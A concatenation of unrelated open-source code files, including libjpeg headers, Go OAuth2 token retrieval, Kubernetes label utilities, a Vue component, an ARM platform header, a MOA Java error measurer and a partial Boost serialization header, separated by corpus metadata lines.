EXTERN(boolean) jpeg_resync_to_restart JPP((j_decompress_ptr cinfo,
int desired));
/* These marker codes are exported since applications and data source modules
* are likely to want to use them.
*/
#define JPEG_RST0 0xD0 /* RST0 marker code */
#define JPEG_EOI 0xD9 /* EOI marker code */
#define JPEG_APP0 0xE0 /* APP0 marker code */
#define JPEG_COM 0xFE /* COM marker code */
/* If we have a brain-damaged compiler that emits warnings (or worse, errors)
* for structure definitions that are never filled in, keep it quiet by
* supplying dummy definitions for the various substructures.
*/
#ifdef INCOMPLETE_TYPES_BROKEN
#ifndef JPEG_INTERNALS /* will be defined in jpegint.h */
struct jvirt_sarray_control { long dummy; };
struct jvirt_barray_control { long dummy; };
struct jpeg_comp_master { long dummy; };
struct jpeg_c_main_controller { long dummy; };
struct jpeg_c_prep_controller { long dummy; };
struct jpeg_c_coef_controller { long dummy; };
struct jpeg_marker_writer { long dummy; };
struct jpeg_color_converter { long dummy; };
struct jpeg_downsampler { long dummy; };
struct jpeg_forward_dct { long dummy; };
struct jpeg_entropy_encoder { long dummy; };
struct jpeg_decomp_master { long dummy; };
struct jpeg_d_main_controller { long dummy; };
struct jpeg_d_coef_controller { long dummy; };
struct jpeg_d_post_controller { long dummy; };
struct jpeg_input_controller { long dummy; };
struct jpeg_marker_reader { long dummy; };
struct jpeg_entropy_decoder { long dummy; };
struct jpeg_inverse_dct { long dummy; };
struct jpeg_upsampler { long dummy; };
struct jpeg_color_deconverter { long dummy; };
struct jpeg_color_quantizer { long dummy; };
#endif /* JPEG_INTERNALS */
#endif /* INCOMPLETE_TYPES_BROKEN */
/*
* The JPEG library modules define JPEG_INTERNALS before including this file.
* The internal structure declarations are read only when that is true.
* Applications using the library should not include jpegint.h, but may wish
* to include jerror.h.
*/
#ifdef JPEG_INTERNALS
#include "jpegint.h" /* fetch private declarations */
#include "jerror.h" /* fetch error codes too */
#endif
#if defined(__cplusplus)
};
#endif
#endif /* JPEGLIB_H */
| {
"pile_set_name": "Github"
} |
#ifndef TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
#define TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
/** \file Compute linearized array access
Ronan at Keryell point FR
This file is distributed under the University of Illinois Open Source
License. See LICENSE.TXT for details.
*/
#include <cstddef>
namespace trisycl::detail {
/** \addtogroup helpers Some helpers for the implementation
@{
*/
/** Compute the linear index of an element inside an OpenCL 2-style range.

    Typically used to implement get_global_linear_id() and
    get_local_linear_id().

    \param[in] range extent of each dimension
    \param[in] id per-dimension index of the element
    \param[in] offset optional per-dimension origin subtracted from \a id
    \return the linearized index, with the last dimension varying fastest
*/
template <typename Range, typename Id>
size_t constexpr inline linear_id(Range range, Id id, Id offset = {}) {
  size_t result = 0;
  auto rank = std::distance(std::begin(range), std::end(range));
  /* Horner evaluation folded from the innermost dimension outwards; a
     decent optimizer removes the first multiplication by 0 and, for a
     defaulted offset, the zero subtractions */
  for (auto d = rank; d-- > 0; )
    result = result * range[d] + (id[d] - offset[d]);
  return result;
}
/// @} End the helpers Doxygen group
}
/*
# Some Emacs stuff:
### Local Variables:
### ispell-local-dictionary: "american"
### eval: (flyspell-prog-mode)
### End:
*/
#endif // TRISYCL_SYCL_DETAIL_LINEAR_ID_HPP
| {
"pile_set_name": "Github"
} |
var baseAt = require('../internal/baseAt'),
    baseFlatten = require('../internal/baseFlatten'),
    restParam = require('../function/restParam');

/**
 * Creates an array of elements corresponding to the given keys, or indexes,
 * of `collection`. Keys may be specified as individual arguments or as arrays
 * of keys.
 *
 * @static
 * @memberOf _
 * @category Collection
 * @param {Array|Object|string} collection The collection to iterate over.
 * @param {...(number|number[]|string|string[])} [props] The property names
 *  or indexes of elements to pick, specified individually or in arrays.
 * @returns {Array} Returns the new array of picked elements.
 * @example
 *
 * _.at(['a', 'b', 'c'], [0, 2]);
 * // => ['a', 'c']
 *
 * _.at(['barney', 'fred', 'pebbles'], 0, 2);
 * // => ['barney', 'pebbles']
 */
// `restParam` gathers the trailing arguments into the `props` array and
// `baseFlatten` flattens it, which is what lets callers mix individual
// keys and arrays of keys freely.
var at = restParam(function(collection, props) {
  return baseAt(collection, baseFlatten(props));
});

module.exports = at;
| {
"pile_set_name": "Github"
} |
<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
>
<Deployment.Parts>
</Deployment.Parts>
</Deployment>
| {
"pile_set_name": "Github"
} |
// Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package internal
import (
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"mime"
"net/http"
"net/url"
"strconv"
"strings"
"sync"
"time"
"golang.org/x/net/context/ctxhttp"
)
// Token represents the credentials used to authorize
// the requests to access protected resources on the OAuth 2.0
// provider's backend.
//
// This type is a mirror of oauth2.Token and exists to break
// an otherwise-circular dependency. Other internal packages
// should convert this Token into an oauth2.Token before use.
type Token struct {
// AccessToken is the token that authorizes and authenticates
// the requests.
AccessToken string
// TokenType is the type of token.
// The Type method returns either this or "Bearer", the default.
TokenType string
// RefreshToken is a token that's used by the application
// (as opposed to the user) to refresh the access token
// if it expires.
RefreshToken string
// Expiry is the optional expiration time of the access token.
//
// If zero, TokenSource implementations will reuse the same
// token forever and RefreshToken or equivalent
// mechanisms for that TokenSource will not be used.
Expiry time.Time
// Raw optionally contains extra metadata from the server
// when updating a token.
Raw interface{}
}
// tokenJSON is the struct representing the HTTP response from OAuth2
// providers returning a token in JSON form.
type tokenJSON struct {
	AccessToken  string         `json:"access_token"`
	TokenType    string         `json:"token_type"`
	RefreshToken string         `json:"refresh_token"`
	ExpiresIn    expirationTime `json:"expires_in"` // at least PayPal returns string, while most return number
}

// expiry converts the relative "expires_in" duration into an absolute
// deadline based on the current time. A zero ExpiresIn yields the zero
// time.Time, which token consumers treat as "never expires" (see the
// Token.Expiry documentation above).
func (e *tokenJSON) expiry() (t time.Time) {
	if v := e.ExpiresIn; v != 0 {
		return time.Now().Add(time.Duration(v) * time.Second)
	}
	return
}
type expirationTime int32
func (e *expirationTime) UnmarshalJSON(b []byte) error {
if len(b) == 0 || string(b) == "null" {
return nil
}
var n json.Number
err := json.Unmarshal(b, &n)
if err != nil {
return err
}
i, err := n.Int64()
if err != nil {
return err
}
if i > math.MaxInt32 {
i = math.MaxInt32
}
*e = expirationTime(i)
return nil
}
// RegisterBrokenAuthHeaderProvider previously did something. It is now a no-op.
//
// Deprecated: this function no longer does anything. Caller code that
// wants to avoid potential extra HTTP requests made during
// auto-probing of the provider's auth style should set
// Endpoint.AuthStyle.
func RegisterBrokenAuthHeaderProvider(tokenURL string) {}
// AuthStyle is a copy of the golang.org/x/oauth2 package's AuthStyle type.
type AuthStyle int
const (
AuthStyleUnknown AuthStyle = 0
AuthStyleInParams AuthStyle = 1
AuthStyleInHeader AuthStyle = 2
)
// authStyleCache is the set of tokenURLs we've successfully used via
// RetrieveToken and which style auth we ended up using.
// It's called a cache, but it doesn't (yet?) shrink. It's expected that
// the set of OAuth2 servers a program contacts over time is fixed and
// small.
var authStyleCache struct {
sync.Mutex
m map[string]AuthStyle // keyed by tokenURL
}
// ResetAuthCache resets the global authentication style cache used
// for AuthStyleUnknown token requests.
func ResetAuthCache() {
authStyleCache.Lock()
defer authStyleCache.Unlock()
authStyleCache.m = nil
}
// lookupAuthStyle reports which auth style we last used with tokenURL
// when calling RetrieveToken and whether we have ever done so.
func lookupAuthStyle(tokenURL string) (style AuthStyle, ok bool) {
authStyleCache.Lock()
defer authStyleCache.Unlock()
style, ok = authStyleCache.m[tokenURL]
return
}
// setAuthStyle adds an entry to authStyleCache, documented above.
func setAuthStyle(tokenURL string, v AuthStyle) {
authStyleCache.Lock()
defer authStyleCache.Unlock()
if authStyleCache.m == nil {
authStyleCache.m = make(map[string]AuthStyle)
}
authStyleCache.m[tokenURL] = v
}
// newTokenRequest returns a new *http.Request to retrieve a new token
// from tokenURL using the provided clientID, clientSecret, and POST
// body parameters.
//
// authStyle decides where the client credentials travel: with
// AuthStyleInParams they are merged into the POST body (alongside any
// values already in v, which is cloned first so the caller's map is not
// mutated); with AuthStyleInHeader they are sent as an HTTP Basic
// Authorization header instead.
func newTokenRequest(tokenURL, clientID, clientSecret string, v url.Values, authStyle AuthStyle) (*http.Request, error) {
	if authStyle == AuthStyleInParams {
		// Work on a copy: the caller may reuse v, e.g. to retry the
		// request with the other auth style during style probing.
		v = cloneURLValues(v)
		if clientID != "" {
			v.Set("client_id", clientID)
		}
		if clientSecret != "" {
			v.Set("client_secret", clientSecret)
		}
	}
	req, err := http.NewRequest("POST", tokenURL, strings.NewReader(v.Encode()))
	if err != nil {
		return nil, err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	if authStyle == AuthStyleInHeader {
		// Credentials are form-urlencoded before being placed in the
		// Basic auth header.
		req.SetBasicAuth(url.QueryEscape(clientID), url.QueryEscape(clientSecret))
	}
	return req, nil
}
func cloneURLValues(v url.Values) url.Values {
v2 := make(url.Values, len(v))
for k, vv := range v {
v2[k] = append([]string(nil), vv...)
}
return v2
}
// RetrieveToken fetches a token from tokenURL by POSTing the values in v,
// authenticating with clientID/clientSecret according to authStyle.
//
// When authStyle is AuthStyleUnknown (zero), the style is auto-probed:
// header auth is tried first and, on failure, the request is retried with
// the credentials in the POST body. The style that worked is cached per
// tokenURL for subsequent calls.
func RetrieveToken(ctx context.Context, clientID, clientSecret, tokenURL string, v url.Values, authStyle AuthStyle) (*Token, error) {
	needsAuthStyleProbe := authStyle == 0
	if needsAuthStyleProbe {
		if style, ok := lookupAuthStyle(tokenURL); ok {
			authStyle = style
			needsAuthStyleProbe = false
		} else {
			authStyle = AuthStyleInHeader // the first way we'll try
		}
	}
	req, err := newTokenRequest(tokenURL, clientID, clientSecret, v, authStyle)
	if err != nil {
		return nil, err
	}
	token, err := doTokenRoundTrip(ctx, req)
	if err != nil && needsAuthStyleProbe {
		// If we get an error, assume the server wants the
		// clientID & clientSecret in a different form.
		// See https://code.google.com/p/goauth2/issues/detail?id=31 for background.
		// In summary:
		// - Reddit only accepts client secret in the Authorization header
		// - Dropbox accepts either it in URL param or Auth header, but not both.
		// - Google only accepts URL param (not spec compliant?), not Auth header
		// - Stripe only accepts client secret in Auth header with Bearer method, not Basic
		//
		// We used to maintain a big table in this code of all the sites and which way
		// they went, but maintaining it didn't scale & got annoying.
		// So just try both ways.
		authStyle = AuthStyleInParams // the second way we'll try
		req, _ = newTokenRequest(tokenURL, clientID, clientSecret, v, authStyle)
		token, err = doTokenRoundTrip(ctx, req)
	}
	// Only remember the style if one of the attempts actually succeeded.
	if needsAuthStyleProbe && err == nil {
		setAuthStyle(tokenURL, authStyle)
	}
	// Don't overwrite `RefreshToken` with an empty value
	// if this was a token refreshing request.
	if token != nil && token.RefreshToken == "" {
		token.RefreshToken = v.Get("refresh_token")
	}
	return token, err
}
// doTokenRoundTrip executes req using the context's HTTP client and
// decodes the response body into a *Token. Responses outside the 2xx
// range are returned as a *RetrieveError carrying the raw body. Both
// JSON bodies and form-encoded bodies ("application/x-www-form-urlencoded"
// or "text/plain", used by some older providers) are supported; the raw
// decoded fields are preserved in Token.Raw for callers that need
// provider-specific extras.
func doTokenRoundTrip(ctx context.Context, req *http.Request) (*Token, error) {
	r, err := ctxhttp.Do(ctx, ContextClient(ctx), req)
	if err != nil {
		return nil, err
	}
	// Cap the body read at 1 MiB to avoid unbounded allocation on a
	// misbehaving server.
	body, err := ioutil.ReadAll(io.LimitReader(r.Body, 1<<20))
	r.Body.Close()
	if err != nil {
		return nil, fmt.Errorf("oauth2: cannot fetch token: %v", err)
	}
	if code := r.StatusCode; code < 200 || code > 299 {
		return nil, &RetrieveError{
			Response: r,
			Body:     body,
		}
	}
	var token *Token
	content, _, _ := mime.ParseMediaType(r.Header.Get("Content-Type"))
	switch content {
	case "application/x-www-form-urlencoded", "text/plain":
		vals, err := url.ParseQuery(string(body))
		if err != nil {
			return nil, err
		}
		token = &Token{
			AccessToken:  vals.Get("access_token"),
			TokenType:    vals.Get("token_type"),
			RefreshToken: vals.Get("refresh_token"),
			Raw:          vals,
		}
		// Best-effort expiry: a missing or malformed expires_in simply
		// leaves Expiry at its zero value ("never expires").
		e := vals.Get("expires_in")
		expires, _ := strconv.Atoi(e)
		if expires != 0 {
			token.Expiry = time.Now().Add(time.Duration(expires) * time.Second)
		}
	default:
		// Anything else is treated as JSON.
		var tj tokenJSON
		if err = json.Unmarshal(body, &tj); err != nil {
			return nil, err
		}
		token = &Token{
			AccessToken:  tj.AccessToken,
			TokenType:    tj.TokenType,
			RefreshToken: tj.RefreshToken,
			Expiry:       tj.expiry(),
			Raw:          make(map[string]interface{}),
		}
		json.Unmarshal(body, &token.Raw) // no error checks for optional fields
	}
	if token.AccessToken == "" {
		return nil, errors.New("oauth2: server response missing access_token")
	}
	return token, nil
}
type RetrieveError struct {
Response *http.Response
Body []byte
}
func (r *RetrieveError) Error() string {
return fmt.Sprintf("oauth2: cannot fetch token: %v\nResponse: %s", r.Response.Status, r.Body)
}
| {
"pile_set_name": "Github"
} |
# Download the Ruby helper library from twilio.com/docs/libraries/ruby
require 'twilio-ruby'

# Get your Account Sid and Auth Token from https://www.twilio.com/console
# NOTE(review): sample code only — in production read the credentials from
# the environment instead of hard-coding them.
account_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
auth_token = 'your_auth_token'
client = Twilio::REST::Client.new(account_sid, auth_token)

# Look up the Notify service by its SID and delete it.
service = client.notify.v1.services('ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
response = service.delete

puts response
| {
"pile_set_name": "Github"
} |
/*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package labels
import (
"fmt"
"sort"
"strings"
)
// Labels allows you to present labels independently from their storage.
type Labels interface {
	// Has returns whether the provided label exists.
	Has(label string) (exists bool)

	// Get returns the value for the provided label.
	Get(label string) (value string)
}

// Set is a map of label:value. It implements Labels.
type Set map[string]string

// String renders the set as "k1=v1,k2=v2,..." with the pairs in sorted
// key order — exactly the format that ParseSelector accepts.
func (ls Set) String() string {
	pairs := make([]string, 0, len(ls))
	for k, v := range ls {
		pairs = append(pairs, k+"="+v)
	}
	// Map iteration order is randomized; sort for deterministic output.
	sort.Strings(pairs)
	return strings.Join(pairs, ",")
}

// Has reports whether label is present in the set.
func (ls Set) Has(label string) bool {
	if _, ok := ls[label]; ok {
		return true
	}
	return false
}

// Get returns the value stored for label, or "" when it is absent.
func (ls Set) Get(label string) string {
	value := ls[label]
	return value
}
// AsSelector converts labels into a selector.
func (ls Set) AsSelector() Selector {
	return SelectorFromSet(ls)
}

// AsSelectorPreValidated converts labels into a selector, but
// assumes that labels are already validated and thus doesn't
// perform any validation.
// According to our measurements this is significantly faster
// in codepaths that matter at high scale.
func (ls Set) AsSelectorPreValidated() Selector {
	return SelectorFromValidatedSet(ls)
}
// FormatLabels converts a label map into its selector-string form,
// substituting "<none>" for an empty map.
func FormatLabels(labelMap map[string]string) string {
	if formatted := Set(labelMap).String(); formatted != "" {
		return formatted
	}
	return "<none>"
}
// Conflicts reports whether labels1 and labels2 disagree on the value of
// any key they share. Keys present in only one of the maps never conflict.
func Conflicts(labels1, labels2 Set) bool {
	// Iterate over the smaller map; lookups in the bigger one are O(1).
	small, big := labels1, labels2
	if len(small) > len(big) {
		small, big = big, small
	}
	for k, v := range small {
		if other, shared := big[k]; shared && other != v {
			return true
		}
	}
	return false
}
// Merge combines the two maps without any conflict checking; on shared
// keys the value from labels2 wins. Neither input map is modified.
func Merge(labels1, labels2 Set) Set {
	merged := make(Set, len(labels1)+len(labels2))
	for _, src := range []Set{labels1, labels2} {
		for k, v := range src {
			merged[k] = v
		}
	}
	return merged
}
// Equals reports whether the two maps hold exactly the same
// key/value pairs.
func Equals(labels1, labels2 Set) bool {
	if len(labels1) != len(labels2) {
		return false
	}
	for k, v := range labels1 {
		if other, ok := labels2[k]; !ok || other != v {
			return false
		}
	}
	return true
}
// AreLabelsInWhiteList verifies that every provided label is present in
// the whitelist with an identical value. An empty whitelist admits
// everything.
func AreLabelsInWhiteList(labels, whitelist Set) bool {
	if len(whitelist) == 0 {
		return true
	}
	for k, v := range labels {
		allowed, found := whitelist[k]
		if !found || allowed != v {
			return false
		}
	}
	return true
}
// ConvertSelectorToLabelsMap converts selector string to labels map
// and validates keys and values.
//
// The selector must be a comma-separated list of "key=value" pairs,
// e.g. "app=nginx,tier=frontend". Keys and values are trimmed of
// surrounding whitespace before validation. Note that values containing
// '=' are rejected, because each pair is split on every '=' and must
// yield exactly two parts. On error, the partially-filled map is
// returned together with the error.
func ConvertSelectorToLabelsMap(selector string) (Set, error) {
	labelsMap := Set{}
	if len(selector) == 0 {
		return labelsMap, nil
	}
	labels := strings.Split(selector, ",")
	for _, label := range labels {
		l := strings.Split(label, "=")
		if len(l) != 2 {
			return labelsMap, fmt.Errorf("invalid selector: %s", l)
		}
		key := strings.TrimSpace(l[0])
		if err := validateLabelKey(key); err != nil {
			return labelsMap, err
		}
		value := strings.TrimSpace(l[1])
		if err := validateLabelValue(key, value); err != nil {
			return labelsMap, err
		}
		labelsMap[key] = value
	}
	return labelsMap, nil
}
| {
"pile_set_name": "Github"
} |
1
3
a a a
| {
"pile_set_name": "Github"
} |
<template>
<div class="movie-list-cell">
<h4>{{ $t('movie.history') }}<a href="">{{ $t('common.browseMore.seemore') }}</a></h4>
<i-row>
<i-col :xs="12" :sm="12" :md="8" :lg="6" v-for="movie in movies" :key="movie.id">
<div class="list">
<movie-list-item :movie="movie"></movie-list-item>
</div>
</i-col>
</i-row>
</div>
</template>
<script type="text/ecmascript-6">
import MovieListItem from '@/components/views/Movie/MovieListItem';

export default {
  name: 'movie-list-cell',
  props: {
    movies: {
      // The prop option key must be lower-case 'type': Vue ignores
      // unknown option keys, so the original capital-T 'Type' silently
      // disabled prop type validation for `movies`.
      type: Array
    }
  },
  components: {
    'movie-list-item': MovieListItem
  }
};
</script>
<style lang="stylus" type="text/stylus" rel="stylesheet/stylus">
@import "../../../common/stylus/theme.styl";
.movie-list-cell
border 1px solid $default-border-color
padding 10px
h4
font-size 26px
line-height 30px
padding 10px 20px 10px 10px
a
font-size 16px
float right
.list
padding 10px
a
.info
height 30%
padding 8px
@media only screen and (max-width: 768px)
height 20%
@media screen and (min-width: 768px)
height 20%
@media screen and (min-width: 992px)
height 30%
@media screen and (min-width: 1200px)
height 30%
.title
margin-bottom 5px
@media only screen and (max-width: 768px)
font-size 16px
line-height 18px
@media screen and (min-width: 768px)
font-size 18px
line-height 21px
@media screen and (min-width: 992px)
font-size 18px
line-height 21px
@media screen and (min-width: 1200px)
font-size 17px
line-height 20px
.desc
@media only screen and (max-width: 768px)
font-size 12px
line-height 14px
@media screen and (min-width: 768px)
font-size 14px
line-height 17px
@media screen and (min-width: 992px)
font-size 14px
line-height 17px
@media screen and (min-width: 1200px)
font-size 13px
line-height 15px
&:hover
.info
@media only screen and (max-width: 768px)
height 22%
@media screen and (min-width: 768px)
height 22%
@media screen and (min-width: 992px)
height 35%
@media screen and (min-width: 1200px)
height 35%
</style>
| {
"pile_set_name": "Github"
} |
libavcodec/s302m.o: libavcodec/s302m.c libavutil/intreadwrite.h \
libavutil/avconfig.h libavutil/attributes.h libavutil/bswap.h config.h \
libavutil/opt.h libavutil/rational.h libavutil/avutil.h \
libavutil/common.h libavutil/macros.h libavutil/version.h \
libavutil/intmath.h libavutil/mem.h libavutil/error.h \
libavutil/internal.h libavutil/timer.h libavutil/log.h libavutil/cpu.h \
libavutil/dict.h libavutil/pixfmt.h libavutil/libm.h \
libavutil/intfloat.h libavutil/mathematics.h libavutil/samplefmt.h \
libavutil/log.h libavcodec/avcodec.h libavutil/samplefmt.h \
libavutil/attributes.h libavutil/avutil.h libavutil/buffer.h \
libavutil/cpu.h libavutil/channel_layout.h libavutil/dict.h \
libavutil/frame.h libavutil/buffer.h libavutil/pixfmt.h \
libavutil/rational.h libavcodec/version.h libavutil/version.h \
libavcodec/internal.h libavutil/mathematics.h libavcodec/mathops.h \
libavutil/common.h
| {
"pile_set_name": "Github"
} |
/*
 * Copyright (c) 2020, ARM Limited and Contributors. All rights reserved.
 *
 * SPDX-License-Identifier: BSD-3-Clause
 */

#ifndef PLATFORM_DEF_H
#define PLATFORM_DEF_H

#include <lib/utils_def.h>

#include <sgi_base_platform_def.h>

/* CPU topology: 4 clusters, each with a single CPU exposing one PE */
#define PLAT_ARM_CLUSTER_COUNT		U(4)
#define CSS_SGI_MAX_CPUS_PER_CLUSTER	U(1)
#define CSS_SGI_MAX_PE_PER_CPU		U(1)

/* Base address of the platform MHUv2 (message handling unit) */
#define PLAT_CSS_MHU_BASE		UL(0x45400000)
#define PLAT_MHUV2_BASE			PLAT_CSS_MHU_BASE

/* Power domains: system domain at level 2, platform handles up to level 1 */
#define CSS_SYSTEM_PWR_DMN_LVL		ARM_PWR_LVL2
#define PLAT_MAX_PWR_LVL		ARM_PWR_LVL1

/* Virtual address used by dynamic mem_protect for chunk_base */
#define PLAT_ARM_MEM_PROTEC_VA_FRAME	UL(0xC0000000)

/* Physical and virtual address space limits for MMU in AARCH64 mode */
#define PLAT_PHY_ADDR_SPACE_SIZE	CSS_SGI_REMOTE_CHIP_MEM_OFFSET( \
						CSS_SGI_CHIP_COUNT)
#define PLAT_VIRT_ADDR_SPACE_SIZE	CSS_SGI_REMOTE_CHIP_MEM_OFFSET( \
						CSS_SGI_CHIP_COUNT)

/* GIC related constants */
#define PLAT_ARM_GICD_BASE		UL(0x30000000)
#define PLAT_ARM_GICC_BASE		UL(0x2C000000)
#define PLAT_ARM_GICR_BASE		UL(0x30140000)

#endif /* PLATFORM_DEF_H */
| {
"pile_set_name": "Github"
} |
/*
* RelativeMeanAbsoluteDeviationMT.java
* Copyright (C) 2017 University of Porto, Portugal
* @author J. Duarte, J. Gama
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*
*/
package moa.classifiers.rules.multilabel.errormeasurers;
import com.yahoo.labs.samoa.instances.Prediction;
/**
 * Relative Mean Absolute Deviation for multi-target regression with a
 * fading factor.
 *
 * For each learned output, the faded sum of absolute prediction errors is
 * divided by the faded sum of |prediction - running faded target mean|;
 * the per-output ratios are then averaged over the outputs the model
 * actually emits votes for.
 */
public class RelativeMeanAbsoluteDeviationMT extends AbstractMultiTargetErrorMeasurer {

	private static final long serialVersionUID = 1L;

	/** Faded sum of the instance weights seen so far. */
	protected double weightSeen;

	/** Per-output faded sum of absolute prediction errors. */
	protected double [] sumError;

	/** Per-output faded sum of the true target values. */
	protected double [] sumY;

	/** Per-output faded sum of |prediction - running target mean|. */
	protected double [] sumErrorToTargetMean;

	/** Whether the per-output accumulators have been allocated. */
	protected boolean hasStarted;

	/** Number of outputs the model emits votes for; fixed on the first call. */
	protected int numLearnedOutputs;

	@Override
	public void addPrediction(Prediction prediction, Prediction trueClass, double weight) {
		int numOutputs = prediction.numOutputAttributes();
		if (!hasStarted) {
			// Lazily allocate the accumulators on the first prediction and
			// count the outputs that carry votes. (The original code assigned
			// hasStarted twice in this branch; a single assignment suffices.)
			sumError = new double[numOutputs];
			sumY = new double[numOutputs];
			sumErrorToTargetMean = new double[numOutputs];
			for (int i = 0; i < numOutputs; i++)
				if (prediction.hasVotesForAttribute(i))
					++numLearnedOutputs;
			hasStarted = true;
		}
		weightSeen = weight + fadingErrorFactor * weightSeen;
		for (int i = 0; i < numOutputs; i++) {
			if (prediction.hasVotesForAttribute(i)) {
				sumError[i] = Math.abs(prediction.getVote(i, 0) - trueClass.getVote(i, 0)) * weight
						+ fadingErrorFactor * sumError[i];
				sumY[i] = trueClass.getVote(i, 0) * weight + fadingErrorFactor * sumY[i];
				// Distance between the prediction and the current faded mean
				// of this target (sumY[i] / weightSeen).
				double errorOutputTM = Math.abs(prediction.getVote(i, 0) - sumY[i] / weightSeen);
				sumErrorToTargetMean[i] = errorOutputTM * weight + fadingErrorFactor * sumErrorToTargetMean[i];
			}
		}
	}

	@Override
	public double getCurrentError() {
		if (weightSeen == 0)
			return Double.MAX_VALUE;
		// Average the per-output relative errors over the learned outputs.
		// NOTE(review): if no output ever carried votes, numLearnedOutputs
		// is 0 and this returns NaN — confirm callers never hit that case.
		double sum = 0;
		int numOutputs = sumError.length;
		for (int i = 0; i < numOutputs; i++)
			sum += getCurrentError(i);
		return sum / numLearnedOutputs;
	}

	@Override
	public double getCurrentError(int index) {
		// NOTE(review): while sumErrorToTargetMean[index] is still 0 this
		// division yields Infinity/NaN, matching the original behavior.
		return sumError[index] / sumErrorToTargetMean[index];
	}

	@Override
	public double[] getCurrentErrors() {
		// Returns null until the first prediction has been processed.
		double[] errors = null;
		if (sumError != null) {
			errors = new double[sumError.length];
			for (int i = 0; i < sumError.length; i++)
				errors[i] = getCurrentError(i);
		}
		return errors;
	}
}
| {
"pile_set_name": "Github"
} |
#ifndef BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_ROUTE_HPP
#define BOOST_ARCHIVE_DETAIL_POLYMORPHIC_OARCHIVE_ROUTE_HPP
// MS compatible compilers support #pragma once
#if defined(_MSC_VER)
# pragma once
#endif
/////////1/////////2/////////3/////////4/////////5/////////6/////////7/////////8
// polymorphic_oarchive_route.hpp
// (C) Copyright 2002 Robert Ramey - http://www.rrsd.com .
// Use, modification and distribution is subject to the Boost Software
// License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See http://www.boost.org for updates, documentation, and revision history.
#include <string>
#include <ostream>
#include <cstddef> // size_t
#include <boost/config.hpp>
#if defined(BOOST_NO_STDC_NAMESPACE)
namespace std{
using ::size_t;
} // namespace std
#endif
#include <boost/cstdint.hpp>
#include <boost/integer_traits.hpp>
#include <boost/archive/polymorphic_oarchive.hpp>
#include <boost/archive/detail/abi_prefix.hpp> // must be the last header
namespace boost {
namespace serialization {
class extended_type_info;
} // namespace serialization
namespace archive {
namespace detail{
class BOOST_ARCHIVE_DECL(BOOST_PP_EMPTY()) basic_oserializer;
class BOOST_ARCHIVE_DECL(BOOST_PP_EMPTY()) basic_pointer_oserializer;
#ifdef BOOST_MSVC
# pragma warning(push)
# pragma warning(disable : 4511 4512)
#endif
// Adapter that implements the type-erased polymorphic_oarchive interface by
// forwarding every call to the concrete archive given as the template
// parameter.  This lets code compiled against polymorphic_oarchive work with
// any concrete output archive implementation.
template<class ArchiveImplementation>
class polymorphic_oarchive_route :
    public polymorphic_oarchive,
    // note: gcc dynamic cross cast fails if the derivation below is
    // not public. I think this is a mistake.
    public /*protected*/ ArchiveImplementation
{
private:
    // these are used by the serialization library.
    virtual void save_object(
        const void *x,
        const detail::basic_oserializer & bos
    ){
        ArchiveImplementation::save_object(x, bos);
    }
    virtual void save_pointer(
        const void * t,
        const detail::basic_pointer_oserializer * bpos_ptr
    ){
        ArchiveImplementation::save_pointer(t, bpos_ptr);
    }
    virtual void save_null_pointer(){
        ArchiveImplementation::save_null_pointer();
    }
    // primitive types are the only ones permitted by polymorphic archives;
    // each overload simply forwards to the implementation archive.
    virtual void save(const bool t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const char t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const signed char t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const unsigned char t){
        ArchiveImplementation::save(t);
    }
#ifndef BOOST_NO_CWCHAR
#ifndef BOOST_NO_INTRINSIC_WCHAR_T
    virtual void save(const wchar_t t){
        ArchiveImplementation::save(t);
    }
#endif
#endif
    virtual void save(const short t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const unsigned short t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const int t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const unsigned int t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const long t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const unsigned long t){
        ArchiveImplementation::save(t);
    }
#if defined(BOOST_HAS_LONG_LONG)
    virtual void save(const boost::long_long_type t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const boost::ulong_long_type t){
        ArchiveImplementation::save(t);
    }
#elif defined(BOOST_HAS_MS_INT64)
    virtual void save(const boost::int64_t t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const boost::uint64_t t){
        ArchiveImplementation::save(t);
    }
#endif
    virtual void save(const float t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const double t){
        ArchiveImplementation::save(t);
    }
    virtual void save(const std::string & t){
        ArchiveImplementation::save(t);
    }
#ifndef BOOST_NO_STD_WSTRING
    virtual void save(const std::wstring & t){
        ArchiveImplementation::save(t);
    }
#endif
    // archive metadata, forwarded unchanged
    virtual library_version_type get_library_version() const{
        return ArchiveImplementation::get_library_version();
    }
    virtual unsigned int get_flags() const {
        return ArchiveImplementation::get_flags();
    }
    virtual void save_binary(const void * t, std::size_t size){
        ArchiveImplementation::save_binary(t, size);
    }
